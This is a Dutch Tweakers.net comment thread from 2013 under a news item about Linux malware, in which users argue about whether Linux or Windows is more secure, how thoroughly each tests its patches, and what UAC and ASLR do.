rechtenbeheer van Linux beperkt de vrijheid dat een potentiëel virus kan hebben enorm, al kan een virus dan nog wel gevaarlijk zijn.

[Reactie gewijzigd door Amanoo op 11 augustus 2013 17:14]

Bedoel je nu dat Linux wel degelijk veilig is dan Windows? Want dan maak je jezelf wat wijs, alles kan omzeild worden en met Windows kan je hetzelfde bereiken als met een Linux distro en visa versa, zolang je maar moeite doet.
dan heb je duidelijk geen kaas gegeten van gnu/linux en zou ik u aanraden eerst eens 2 jaar dagelijks gnu/linux te gebruiken ipv gratuite uitspraken te maken uit onwetendheid
Ook Linux is niet 100% veilig. In het verleden zijn er al exploits geweest waarmee programmas of zelfs gebruikers hun rechten konder verhogen tot op root niveau. Daarentegen staat Windows vandaag een stuk veiliger. Voor 7/8 zijn er een stuk minder exploits te vinden in Windows of de kerncomponenten dan vroeger in het XP tijdperk. De meeste lekken in het OS komen vandaag voort uit third party apps zoals een browser, PDF reader, flash player, java, ... . Exploits die in theorie platformonafhankelijk zijn.
een klein voorbeeld van deze week, tor browser bundle was exploited door java malware. echter de gnu\linux variant van de tor browser bundle niet ;) tot zover het windows betoog

natuurlijk is gnu\linux ook onderhevig aan malware maar vaak door de reden dat gebruikers hun installatie niet up to date houden, buiten hun ecosysteem applicaties beginnen installeren, etc...

het staat echter als een paal boven water dat wanneer je de grotere gnu\linux distros zoals fedora en debian gebruikt op de juiste manier deze kans nagenoeg onbestaand is om onderhevig te zijn aan malware

de meest risicovolle distros zijn alle derivatives van de grote distros die meer aandacht schenken aan uitzicht en skins dan aan de werkelijke robuustheid van de distro

vandaar mijn advies aan iedereen, enjoy the taste of debian gnu\linux _/-\o_
ik heb het meerdere kansen gegeven om te bewijzen, en ik heb er echt 100% voor open gestaan, maar ik ben er mee gestopt. het is niet logisch t.o.v. windows, commandos die je moet gebruiken zijn verre van bekent, dus het betekent constant een leer curve, en ik heb zeker geen stabieler OS ervaren. heel af en toe start ik mint nog op, maar ik ga er zeker geen tijd meer in steken.
Het is niet logisch tov Windows?
Waarom zou je Linux willen vergelijken met Windows? Linux is niet gemaakt om op Windows te lijken.

En de commandos.... die kun je gewoon leren.
Ik spreek ook meer dan één taal en gebruik ook Java en Python, qt en C++
dus het betekent constant een leer curve
Er zijn mensen die hopen dat ze nog heel lang, mogen blijven leren.... ik ben er daar eentje van.

[Reactie gewijzigd door mrlammers op 12 augustus 2013 14:22]

een klein voorbeeld van deze week, tor browser bundle was exploited door java malware. echter de gnu\linux variant van de tor browser bundle niet ;) tot zover het windows betoog
Dat heeft helemaal niks met Windows te maken.
Dat lek zat in Firefox, en toevallig heeft men alleen voor de Windows-build een exploit gemaakt (je richt immers je pijlen op de grootste doelgroep, laaghangend fruit enzo).
Voor andere OSen had dit ook gekund, de fout zat immers in de code van Firefox, niet in het OS.

Als jij denkt dat het OS veiliger is doordat er minder van dit soort exploits voor ontwikkeld zijn, dan snap je er echt helemaal niks van, met alle respect. En dan hierboven nog roepen dat mensen maar even 2 jaar linux moeten gebruiken... Ik denk dat jij eerst het een en ander moet bijleren.
het staat echter als een paal boven water dat wanneer je de grotere gnu\linux distros zoals fedora en debian gebruikt op de juiste manier deze kans nagenoeg onbestaand is om onderhevig te zijn aan malware
Niet dus.
Ik geef je gelijk in dat Linux niet persé veiliger is dan bijvoorbeeld Windows. Maar ik denk dat als Linux ook een groot doelwit zou worden de community de fouten wel een stuk sneller patched.

Daarnaast zal het enige grote probleem dat ik zo voorzie zijn dat we ons helemaal moeten terugtrekken in repositories zoals die van Arch, Canonical en dergelijke.
Maar ik denk dat als Linux ook een groot doelwit zou worden de community de fouten wel een stuk sneller patched.
Dat wel, maar de vraag is of je daar blij mee moet zijn.
De voornaamste reden dat er bij linux sneller patches te vinden zijn, is dat men deze veel minder uitgebreid test.
Microsoft heeft natuurlijk een ENORME verantwoordelijkheid ten opzichte van hun (betalende) klanten, en ze kunnen niet zomaar patches de wereld in sturen.

Bij linux patches is het dan ook al meerdere keren voorgekomen dat patches weer andere bugs introduceerden, of het probleem achteraf toch niet oplosten etc, waardoor er weer patches over patches heen moesten komen.
Hier is bv ook een leuke: http://blog.zx2c4.com/749
Iemand heeft doodleuk een stukje code weggehaald omdat hij dacht dat dat niet nodig was... Die code was eerder juist geintroduceerd om een security flaw te fixen.
Niemand heeft dat verder getest, dus dat gat kwam mooi weer in de productie-versies van linux terecht. En moest het weer opnieuw gepatcht gaan worden.

Ik zeg niet dat dat bij Microsoft nooit voorkomt, maar er wordt daar wel veel meer getest voordat een nieuwe update de deur uitgaat (en ook op regressie getest natuurlijk).

Sneller patchen moet geen doel op zich worden. En dat lijkt het bij linux wel te zijn.
Bij linux patches is het dan ook al meerdere keren voorgekomen dat patches weer andere bugs introduceerden, of het probleem achteraf toch niet oplosten etc, waardoor er weer patches over patches heen moesten komen.
Regressies zijn er ook in de closed-source wereld, je hoort er gewoon niet van. Microsoft released ook hotfixes voor specifieke issues zonder grondige tests als tussenoplossing. De Linux developers beschuldigen van slecht werk is laag bij de grond.

[Reactie gewijzigd door goarilla op 12 augustus 2013 11:53]

Regressies zijn er ook in de closed-source wereld, je hoort er gewoon niet van.
Natuurlijk wel. Er zijn genoeg onderzoekers bezig met het zoeken naar security flaws in closed-source OSen, en die publiceren die informatie ook gewoon.
Daarnaast is Microsoft ook vrij open over wat iedere patch doet, in hun KB-artikelen.
Als er regressive is van een bug, zal dat niet zomaar onopgemerkt blijven.
Microsoft released ook hotfixes voor specifieke issues zonder grondige tests als tussenoplossing.
Ja, maar die pushen ze niet zomaar naar eindgebruikers. Die hotfixes kun je doorgaans alleen op speciaal verzoek, en op eigen risico krijgen.
Pas na de testfase worden ze via Windows Update verspreid naar normale gebruikers.
De Linux developers beschuldigen van slecht werk is laag bij de grond.
Hoezo? Ik geef toch een bron? Het is gewoon een feit, geen 'beschuldiging'. Ik zie ook niet in hoe het benoemen van feiten 'laag bij de grond is'.
Mag je geen (gegronde) kritiek hebben op linux? Is linux heilig ofzo?
Wat een rare opmerking!
De kernel heeft staging trees voor de subsystemen en een staging subtree voor nieuwe drivers in mainline voor de early adaptors. Er wordt heus wel goed getest. Er glipt soms iets door de mazen van het net maar dat gebeurd overal.
Sneller patchen moet geen doel op zich worden. En dat lijkt het bij linux wel te zijn.
Volgens mij ben jij hier aan het insinueren dat kernel dev's patches uitbrengen om goed in de statistieken te komen. En ja, dat vind ik laag bij de grond.
Er wordt heus wel goed getest.
De feiten spreken je tegen.
Volgens mij ben jij hier aan het insinueren dat kernel dev's patches uitbrengen om goed in de statistieken te komen. En ja, dat vind ik laag bij de grond.
Kom op zeg. Moet je kijken wat er allemaal over Windows geroepen wordt... Als er een keer kritiek is op linux, dan kunnen de heren ineens niets hebben.
Nog los van het feit dat 99% van wat er over Windows geroepen wordt niet eens waar is, terwijl ik hier gewoon een duidelijk voorbeeld noem.

Ik zeg alleen dat er structureel vaker dingen opnieuw gepatcht moeten worden voor linux dan voor andere OSen (waar genoeg empirisch bewijs voor te vinden is, dus dat hoeven we niet te insinueren).
Dat is de keerzijde van snel patches uitbrengen.
Ik zeg alleen dat er structureel vaker dingen opnieuw gepatcht moeten worden voor linux dan voor andere OSen (waar genoeg empirisch bewijs voor te vinden is, dus dat hoeven we niet te insinueren). Dat is de keerzijde van snel patches uitbrengen.
Je ziet de patches niet in closed-source code. Daarnaast in linux is iedere commit een patch, het is daar de basiseenheid. Ik heb een leuk ideetje ... blablabla ... kijk hier een patch, ... Maar de dingen die in mainline komen die zijn echt wel getest !
Kom op zeg. Moet je kijken wat er allemaal over Windows geroepen wordt... Als er een keer kritiek is op linux, dan kunnen de heren ineens niets hebben.
Nog los van het feit dat 99% van wat er over Windows geroepen wordt niet eens waar is, terwijl ik hier gewoon een duidelijk voorbeeld noem.
Er worden onwaarheden gespuit over Windows en over Linux. Jij voelt je gewoon maar in 1 geval slachtoffer, hetzelfde met mij overigens.
Je ziet de patches niet in closed-source code.
Wat komt er dan iedere keer binnen via Windows Update?
Daarnaast in linux is iedere commit een patch, het is daar de basiseenheid. Ik heb een leuk ideetje ... blablabla ... kijk hier een patch, ... Maar de dingen die in mainline komen die zijn echt wel getest !
Ik heb het natuurlijk niet over patches op source-tree niveau. Ik heb het over updates die inderdaad in de mainline komen. Heb je uberhaupt op het linkje geklikt waaraan ik refereerde? Ik krijg de indruk van niet. Je bent blijkbaar zo overtuigd van je gelijk dat je niet eens hoeft te weten waar het over gaat?

Dat voorbeeld dat ik gaf was namelijk een bug die in meerdere mainline linux kernels aanwezig was, en dus ook in een groot aantal gangbare distributies te vinden was.
Hier werd de bug geintroduceerd: http://git.kernel.org/cgi...x.git/commit/?id=198214a7
Hier werd ie pas gefixt: http://git.kernel.org/cgi...7efd422a804dbb27977a3cccc
Daar zat dus 10 maanden tussen. Lang genoeg om tot een kernel-release te komen en opgenomen te worden in verschillende release-versies van linux distro's.

Nog een pijnlijke ontdekking in dat blog trouwens:
"It turns out that su on the vast majority of distros is not compiled with PIE, disabling ASLR for the .text section of the binary!"

Jaja, bij een hoop Linux distros is ASLR maar een wassen neus, want de code is niet gecompileerd met de juiste switches om hier gebruik van te maken! (Dit probleem speelt overigens in Windows niet, omdat men bij relocatable code niet afhankelijk is van IP-relative addressing, maar gewoon de code tijdens het inladen patcht met de relocaties. Dit is ook efficienter at runtime).

Dat was overigens maar 1 voorbeeld. Er zijn genoeg anderen, zoals bv: http://arstechnica.com/se...rs-even-after-silent-fix/
Maarja, je leest ze blijkbaar toch niet, je weet toch alles al beter, nietwaar? Dus waarom zal ik moeite doen om links te posten.
Jij voelt je gewoon maar in 1 geval slachtoffer, hetzelfde met mij overigens.
Fijn dat je toegeeft dat je compleet linux-centrisch bent.
Beetje jammer dat je dan dan onterecht op mij probeert te reflecteren. Niet iedereen zit zo in elkaar als jij, gelukkig.

Verder zijn de onwaarheden verrassend genoeg vrijwel altijd afkomstig uit de linux-hoek, en zijn ze vrijwel altijd negatief voor Windows, en positief voor linux. Linux-mensen denken al gauw dat ze ergens verstand van hebben, en gaan dan dome dingen lopen roepen. Boude uitspraken over de vermeende superioriteit van de security van linux, zonder gehinderd te worden door enige kennis van Windows (en vaak ook van linux niet bijster veel te weten).

[Reactie gewijzigd door Scalibq op 13 augustus 2013 13:42]

Dat wel, maar de vraag is of je daar blij mee moet zijn.
De voornaamste reden dat er bij linux sneller patches te vinden zijn, is dat men deze veel minder uitgebreid test.
Microsoft heeft natuurlijk een ENORME verantwoordelijkheid ten opzichte van hun (betalende) klanten, en ze kunnen niet zomaar patches de wereld in sturen.
Bron?? Microsoft heeft toch atlijd de consument als tester gehad?
Dit verhaal klinkt echt alsof je van een andere planeet komt.

Waar komen die 2 decennia aan kapotte programmatuur grappen vandaan?
Bron??
Ik heb al een aantal bronnen genoemd.
Beetje opletten graag.
Microsoft heeft toch atlijd de consument als tester gehad?
Dit verhaal klinkt echt alsof je van een andere planeet komt.

Waar komen die 2 decennia aan kapotte programmatuur grappen vandaan?
Ah, de kinderen komen ook weer meespelen...
Je geeft dus zelf nu ook toe dat de kernels tussen beiden nogal verschillend zijn. Dit is het punt dat ik de hele tijd al probeerde te maken. Begrijpend lezen en correct communiceren is lastiger voor de een dan de ander. Dat begrijp ik ;)

De bedrijfsfilosofie is nog steeds alles moet kunnen:
- Office op de tablet. Wat doet zoiets op een tablet?
- Televisie kijken op een spelcomputer
- Office standalone of op Cloud. Het kan allebei!

"Alles moet kunnen" is nog steeds hun bedrijfsfilosofie.
Je geeft dus zelf nu ook toe dat de kernels tussen beiden nogal verschillend zijn.
Ja, alleen komt het precies verkeerd uit voor jouw argumenten, dus slaat je hele verhaal nergens op.
"Alles moet kunnen" is nog steeds hun bedrijfsfilosofie.
En wat is daar mis mee?
Ik krijg sterk de indruk dat OS X en de grotere linux distributies net zo hard vinden dat "alles moet kunnen".

[Reactie gewijzigd door Scalibq op 13 augustus 2013 22:30]

Geen Bron gegeven

En vervolgens een 'ad hominem' er achter aan.

Siert je niet echt.

[Reactie gewijzigd door Elite25 op 13 augustus 2013 23:16]

Oh, sorry, had ik je kinderachtige anti-MS gezeur serieus moeten nemen?
Bronnen had ik al gezegd, zoek in deze pagina eens op posts van 'scalibq'.

Blijkbaar ben je al een tijdje door je argumenten heen, en kun je alleen nog maar kinderachtig doen.

[Reactie gewijzigd door Scalibq op 13 augustus 2013 23:24]

Mijn hele betoog was dat er behoorlijke verschillen tussen beiden zaten.

Ik hoef geen argumenten meer aan te leveren aangezien je indirect precies hetzelfde zegt.

Voor de rest wens ik u succes met uw manier van communiceren.
Ik hoef geen argumenten meer aan te leveren aangezien je indirect precies hetzelfde zegt.
Je zei wel meer dan alleen iets over kernel-verschillen (waar je blijkbaar wel de klok had horen luiden, maar niet wist waar de microkernel hing).

Zo geef je bv geen argumenten waarom die "alles moet kunnen"-filosofie niet goed zou zijn.

Jouw manier van communiceren is lekker... Eerst iemand voor autist uitmaken en dan een ninja-edit, om vervolgens een 'holier than thou'-post te maken... Ik lach me hier rot

[Reactie gewijzigd door Scalibq op 13 augustus 2013 23:26]

Waar zeg ik dat de "Alles moet kunnen" filosofie niet goed is?
Zo'n filosofie heeft zijn voor- en nadelen.

Je leest extra dingen tussen de regels door die er duidelijk niet staan.

En ja, ik moest weg, dus ik had mijn post afgeraffeld en het ongelukkig neergezet. Excuses daarvoor.
Eerst zeg je:
Ook hebben de besturingssystemen van origine een hele andere filosofische benadering. Onder UNIX/Linux mag de gebruiker van oorsprong zo goed als niks, terwijl onder de Windows de gebruiker alles mocht.
Wat meer is "alles moet mogen" (wat dus niet waar is voor Windows NT).
Dit gebruikte je als argument bij deze uitspraak:
Ik deel je mening niet dat het niet hard te maken is, niet echt
Dus volgens jou is er WEL een structureel verschil in beveiligingsniveau/kwaliteit/hoe je het wilt noemen, en dit zou dan een argument zijn (wat het op zich ook wel is, maar zoals ik al zei, het is flauw om je argument te baseren op een Windows-familie waar het laatste product uit 2000 stamt. En zoals gezegd, voor NT gaat dat niet op, ook niet voor de eerste versie uit 1993).

Dan kom je met:
De bedrijfsfilosofie is nog steeds alles moet kunnen:
- Office op de tablet. Wat doet zoiets op een tablet?
- Televisie kijken op een spelcomputer
- Office standalone of op Cloud. Het kan allebei!
Nu is het ineens "alles moet kunnen" (over functionaliteit ipv security dus). En "Wat doet zoiets op een tablet?" heeft toch duidelijk een negatieve connotatie (afgezien van het feit dat het slechts jouw mening is).

En nu ineens heb je je WEER bedacht, en is die andere filosofie ineens niet meer een nadeel. Waarom ben je er dan uberhaupt over begonnen?

[Reactie gewijzigd door Scalibq op 14 augustus 2013 00:40]

Alles moet positief of negatief zijn? Werkt het goed voor je om alles heel erg zwart/wit te bekijken?

Ik zou ook kunnen zeggen: "Op je tablet kan je zelfs aan je office document verder werken!"

Zeg ik hetzelfde met positieve connotatie. (is het nog steeds slechts mijn mening)
Alles moet positief of negatief zijn? Werkt het goed voor je om alles heel erg zwart/wit te bekijken?
Ga je weer kinderachtig woorden verdraaien.
Zie hierboven: jij draagt het eerst zelf als argument aan (en ja, een argument moet wel een bepaalde positieve danwel negatieve waarde hebben). Nu krabbel je terug.
Nou, mijn MENING is dat "alles moet kunnen" relatief gevaarlijk kan zijn en sommige dingen een beetje mal zijn.

Ik denk dat iemand die de specifieke dingen allemaal gebruikt het heel nuttig vindt.

Maar wat doet mijn mening ertoe? Feit is dat die dingen kunnen.

[Reactie gewijzigd door Elite25 op 15 augustus 2013 01:38]

Geweldig dat je zegt dat ik mij eens 2 jaar zou moeten verdiepen in Linux (2 jaar? Zo lang?) terwijl je zelf niet eens weet dat die exploit in Firefox zat en niet in Windows én dat enkel voor de Windows variant van Firefox ook een exploit was uitgewerkt. Als ik jou was zou ik me eens 1 dagje in Windows verdiepen, langer heb je heus niet nodig, toch niet voor Windows.
Loller1 wordt wel na beneden gemod, maar hij heeft wel gelijk.

Overigens gebruik ik al meer dan 10 jaar GNU/linux. (Altijd slackware gebruikt, en nu debian, en openbsd voor de server.) Ik heb er van alles mee ingericht: servers, lean desktops, desktops met volledige WM omgevingen. En zelfs na die ervaringen geef ik Loller1 gelijk.

Alles hangt af van vertrouwen, en hoe de gebruiker zijn desktop gebruikt. Bij een single user systeem maakt het het systeem zelf eigenlijk niet uit. De user heeft al genoeg rechten.. De user kan bij al zijn data, kan zelf servers draaien, plugins gebruiken, etc.. Zelfs mounten van home partition met noexec kan de boel niet volledig beveiligen. Al de rechten van de USER kunnen door een script, plugin of app miscbruikt worden.

Alle data waar de USER bij kan (en dat is dus alles op een single user systeem) kan gestolen worden.

Een typisch voorbeeld van misbruik van vertrouwen is een communicatie programma genaamd SKYPE. Deze steelt vermoedelijk data van gebruikers. History, browser history, user gegevens van de het linux OS, etc. Met strace kan precies gevolgd worden wat dit programma mogelijk allemaal zou kunnen transfereren. Er kan niet worden gecontroleerd welke gegevens verstuurd wordt, daar de gebruiker niet over de encryptie key beschikt. Dit programma kan op user niveau gedraaid worden.
Een woord: Android.

Het ultieme bewijs van mijn uitspraak.
In het verleden was Windows wel degelijk een stuk onveiliger. Het is pas met de komst van Vista en de bijhorende introductie van het zo gehate UAC dat het beveiligingsmodel in Windows sterk verbeterd is geweest. In Linux heeft de scheiding der machten er altijd al ingezeten, in Windows heeft men veel moeite moeten doen om een vergelijkbaar systeem er aan vast te hangen.

In elk systeem is de eindgebruiker de zwakste schakel. Als je altijd uit gemakzucht inlogd als root dan is Linux alles behalve veilig te noemen, maakte je vroeger in XP gebruik van de accounts met beperkte rechten dan was XP een veiliger OS.
Het is pas met de komst van Vista en de bijhorende introductie van het zo gehate UAC dat het beveiligingsmodel in Windows sterk verbeterd is geweest.
Ik denk dan niet dat jij begrijpt wat een beveiligingsmodel is...
Voor het grootste deel was het beveiligingsmodel al lang aanwezig in Windows NT. UAC is maar een kleine uitbreiding daarop.
Waar je normaal gesproken met de hand "Run as Administrator" moest doen als je iets wilde doen met admin rights vanuit een normale account, kreeg je nu automatisch een popup, en kon je gewoon 'yes' klikken, in plaats van een wachtwoord intypen (als jouw account admin-rechten heeft dan, want dat kun je natuurlijk nog steeds uitzetten).

Het grote verschil is hier voor de thuisgebruiker: deze kon nu makkelijk als niet-admin z'n dagelijkse werk doen, en even 'yes' klikken op een UAC-promptje als hij wat systeeminstellingen wou wijzigen of een programma wilde installeren of wat dan ook.

Voor de zakelijke gebruiker verandert er eigenlijk niks: De systeembeheerder gaf normale gebruikers sowieso al geen admin-toegang, en dus kunnen ze nu ook geen UAC-prompts krijgen, want die rechten hebben ze niet.

Die scheiding heeft er dus WEL altijd al ingezeten in Windows NT, en werd door professionele systeembeheerders ook gebruikt. Het ging alleen fout toen de normale gebruikers van Windows 9x overstapten op XP. Deze mensen hadden niet de kennis van een systeembeheerder, en daar kwam nog eens bovenop dat veel niet-zakelijke software erg ranzig geschreven was, en daardoor veel rechten nodig had. Het was dus erg lastig om als niet-administrator te werken in de praktijk. Het KON wel, want multiuser, policies, ACLs etc hebben vanaf dag 1 al in Windows NT gezeten, het was immers een zakelijk OS, gericht op complete office-netwerken met servers en clients.

UAC heeft er vooral voor gezorgd dat normale gebruikers nu zonder enige kennis als niet-admin hun dagelijkse werk kunnen doen. In de praktijk is het een stuk veiliger, maar aan het onderliggende beveiligingsmodel heeft het niet heel veel veranderd. Het grootste verschil is dat je nu een account kunt hebben die wel admin-rechten heeft, maar die niet geactiveerd zijn, totdat je op de UAC-prompt klikt.
Je switcht dus niet daadwerkelijk meer van een gewone user-account naar een admin-account, je switcht de rechten van de huidige account.

[Reactie gewijzigd door Scalibq op 11 augustus 2013 20:31]

veel show maar weinig bewijzen... op kooptv tracht men ook dagelijks mensen te bedotten met afslankmiddelen die jou een six pack bezorgen op 4 weken tijd :)

eerst bewijzen, dan pas in paniek schieten.... bovenstaand artikel is dan ook 0% van belang zolang er geen concrete gegevens beschikbaar zijn


als je als gnu\linux gebruiker binnen het ecosysteem van uw distro blijft werken is de kans nagenoeg nihil.

FYI: debian gnu/linux is the best _/-\o_
Om iets op te starten in een homedir heb je geen wachtwoord nodig. Prop iets in /home/gebruiker/.willekeurige_map en gaan. Onder welke gebruiker wordt je browser gestart? Je emailclient? Niks geen wachtwoorden benodigt om die te monitoren, of cookies te jatten uit je homedir.

offtopic:
Het maakt geen donder uit welke distro je draait, als je weet waar je mee bezig bent maak je er zelf het beste van.
Want het linux ecosysteem is zo volledig dat je nooit eens iets moet downloaden dat niet in de repo van je distro zit. En dat ecosysteem zorgt er ook netjes voor dat kwetsbaarheden in je browser of java zomaar teniet worden gedaan... . Neen, ook als linux gebruiker moet je altijd opletten met wat je doet. Een drive-by aanval is zo snel gebeurd, kijk maar naar de malware die via sites als nu.nl werd verspreid. Het kan overal gebeuren en het kan iedereen treffen.
de repositories van een debian gnu\linux zijn uitgebreid hoor - er is geen nood om buiten het ecosysteem te gaan werken. fyi, +37500 packages beschikbaar in de debian repos
Printrun, Slic3r, Repetier-host, Cura en Skeinforge.. allemaal software die ik regelmatig gebruik, en niet door mij alleen, maar door velen in de 3D-print wereld, en die geen van allen in de debian repo's te vinden zijn,
37500 packages klinkt als veel, maar daar zitten veel libraries etc bij, en is natuurlijk niks vergeleken met bijvoorbeeld de 850.000 apps in Apple's App Store.
Ze plitsen ook iedere package ! Ze rippen de headers en de libs eruit en smijten die in een dev package. De client tools gaan in een client package en de server daemons in een server package, enz ...
hoe wil jij downloaden van trojans voorkomen, ervanuitgaande dat je internet hebt op je linux?

Je draait vast geen Qubes noch een handmatig aangepast Xen op je machine.

Dus elke website kan jouw machine dan injecteren door de browser out of the box te laten gaan.

Je draait die browser in dezellfde user space als de rest van je software. 1 keertje dan een keer ergens een SUDO of SU commando intikken op een popup window en je bent de pineut :)

Dat is als een highschool student het doet.

De wat geavanceerdere trojans komen op dezelfde manier binnen zonder problemen en hebben die toestemming natuurlijk niet nodig.

p.s. als je op de smp-kernel mailing list zoekt, zie je daar een posting uit 1999 met een door mij gemelde mogelijke exploit, die tot op heden nog niet is gefixed in de linux kernel. Enige voorwaarde: SMP kernel nodig. De exploit betreft hoe elke user die al binnen is op je machine zijn data root permissie kan geven.

Om het echt 100% te fixen als in: met bewijs dat het niet kan, moet die hele kernel compleet herschreven worden. Windows is nog erger natuurlijk :)

Het monolithische gedrag van die kernels betekent simpelweg dat het criminele gilde net als de inlichtingendiensten gewoon binnen kan komen bij je.

Alleen het opzetten van een compleet nieuwe kernel zou dit probleem voor een groot gedeelte oplossen, van de software kant dan.

[Reactie gewijzigd door hardwareaddict op 11 augustus 2013 20:50]

Heb je een linkje naar die post?
Ik gebruik su of sudo liever niet binnen een sessie als gebruiker ./home/Cinq. Gewoon een aparte sessie starten >>> 'root' en daarin je CL gebruiken !

Uiteraard een apart ww voor gebruikers en 'root', buiten het gebruik van SELinux & Aparmor.
Gaat prima in b.v. openSuSE 12.2 !

Daarnaast kan je bij een goed beveiligde bank nix met met inlogcode, slechts 1x te gebruiken. Moet pas# ingeven om aan te tonen dat ik de pas in handen heb & het totaalbedrag bevestigen in tweede 'challance / respond'.

Kan iemand vertellen hoe het dan alsnog mogelijk is om geld van mijn rekeningnummer te halen ?
Voor alu-hoedjes raad ik verder een 'Linux live-CD/DVD' aan !
Bovendien is het opmerkelijk dat de cybercriminelen zich richten op Linux-systemen: niet alleen is het aantal te treffen systemen veel kleiner dan op Windows draaiende computers
Het zou misschien niet zo opmerkelijk zijn als men erover na had gedacht dat er veel mensen, dankzij de crisis en de groter wordende onvrede richting de keuzes die Microsoft heeft gemaakt met Windows 8, op gebruiksvriendelijke Linux distributies zijn overgestapt omdat het gratis en veelal betrouwbaar wordt geacht.

Daarnaast is er ook een groep ervaren Linux systeembeheerders die dus ook Linux laptops hebben. Als het jou lukt als cracker om zo'n systeem te kunnen contamineren, vang je natuurlijk schat veel aan info op.

En zolang bedrijven zich alleen maar fixeren op het beveiligen van hun Windows KA omgeving zonder dat er gekeken wordt hoe ook o.a Linux KA clients beveiligt kan worden, is het dus altijd prijs.
Nou wat loller1 zeg zit wel wat in
Maar Linux is wat veiliger als Windows.
Maar dat heeft alleen maar te maken denk ik omdat groot en deels nog altijd Windows word gebruikt.
En het is alleen maar logisch dat makers van virussen trojans etc. voor Windows kiezen.
Maar er komen steeds meer Linux gebruikers bij en dan komen zeker maar langzaam ook virussen enz voor uit. Wat loller1 al zij alles is te kraken met moeite, alleen is minder interessant wegens de populariteit van een besturingen systeem.

Op dit item kan niet meer gereageerd worden.



Populair: Tablets Nokia Smartphones Beheer en beveiliging Google Laptops Apple Sony Games Politiek en recht

© 1998 - 2014 Tweakers.net B.V. onderdeel van De Persgroep, ook uitgever van Computable.nl, Autotrack.nl en Carsom.nl Hosting door True

Beste nieuwssite en prijsvergelijker van het jaar 2013